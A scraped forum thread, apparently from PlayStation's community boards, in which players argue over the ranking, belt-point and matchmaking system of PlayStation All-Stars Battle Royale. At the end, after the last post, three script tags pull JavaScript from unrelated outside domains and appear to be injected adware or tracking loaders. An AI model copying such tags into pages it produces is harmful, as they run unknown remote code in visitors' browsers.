Gaming Beast
2105 posts

Re: The Skill Ranking system NEEDS to be replaced

[ Edited ]
Feb 22, 2013

A rating system must have no preconception of what the game actually is: it should only care about whether you win or lose. Arbitrarily defining some behaviors to be "good" and some to be "bad" will only cause players to be good at doing those things, not necessarily good at winning in PSASBR.

For example, there can be advanced strategies like deliberately getting hit to get knocked back in order to avoid an incoming super etc. will skew your suggested system because while you are getting hit with a combo you are actually setting it up for something more advanced. Again, in a game where many characters are not even combo centric, it's not something that will reflect skill such as reading your opponent, landing supers at the right time, taking a knock back deliberately, which all contributes towards wins but not necessary reflected as combos or other "objectives" you have for measuring skill.

In general, good players will win OFTEN, whether they achieve this using combos or other techniques is irrelevant as far as the rating system goes. The only way a rating system works is when you have a fairly large number of players playing MANY matches.

Counting combos, kills per minute etc. are great for statistics but that should not be used to determine the relative rating of players in a pool. What matters is winning.

If there are exploits in the game those should be fixed instead of fixing the rating system.

The problem right now is poor pairing of players (Red belt with blue etc.) and that is not because of the rating system. That is the matchmaking aspect that needs fixing. People use cheap exploits (kcs whatever) to win and that again is a problem/aspectof the game and not the actual rating system.

------
Playstation God of War Stars Battle Bore y'all !!!
Message 11 of 16 (75 Views)
0 Likes
Fender Bender
2538 posts

Feb 22, 2013

Just have it so people can understand how many bp they will gain/lose. Low ranked people who win vs high ranked gain a lot of belt points that get taken away from the high ranked. People at the same rank take away equal amounts of belt points, and high ranked people who beat low ranked only take a small amount. It seems intuitive and obvious, but obviously, this isn't the way it works. People complain about losing belt points for getting in second etc.

Then have a bigger penalty for rage quitters, and try to implement things that discourage it (no pause menu in tournament mode). After that's done, simply pit people against each other depending on their rank and belt points. Very simple concept, but apparently, difficult to implement. I know I'm not smarter than the developers, but we need this.

Message 12 of 16 (66 Views)
0 Likes
Last Guardian
9942 posts

Feb 22, 2013
I just wish there was a set amount of points for wins and loses. Sometimes I win I'll get 5 points, sometimes I lose I'll lose 15 points.
 photo Hammer Girl_zpsnrg29qur.jpg
Message 13 of 16 (64 Views)
0 Likes
I Only Post Everything
1147 posts

Feb 22, 2013

A system like that would punish Sweet Tooth players like myself, and other non-combo focused characters such as Jak.

Message 14 of 16 (61 Views)
0 Likes
Gaming Beast
2105 posts

Feb 22, 2013

nasrulez wrote:
I just wish there was a set amount of points for wins and loses. Sometimes I win I'll get 5 points, sometimes I lose I'll lose 15 points.

That cannot be so. It will have to be based on the rating of other players that determines how many points you lose or gain. If you lose against a bunch of blue belts when you have Black belt, the balancer will try to take away  more points. This is only a simplistic example.

------
Playstation God of War Stars Battle Bore y'all !!!
Message 15 of 16 (61 Views)
0 Likes
Gaming Beast
2167 posts

Feb 22, 2013
The only thing I really want from ranked is A) Something to punish rage quitters (I've posted a MOBA system suggestion multiple times before, but I can look for it if you want), and B) For the matches to be more balanced amongst people of your skill group. If you are more than 200 belt points away from me in either direction, I shouldn't be facing you.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 16 of 16 (46 Views)
0 Likes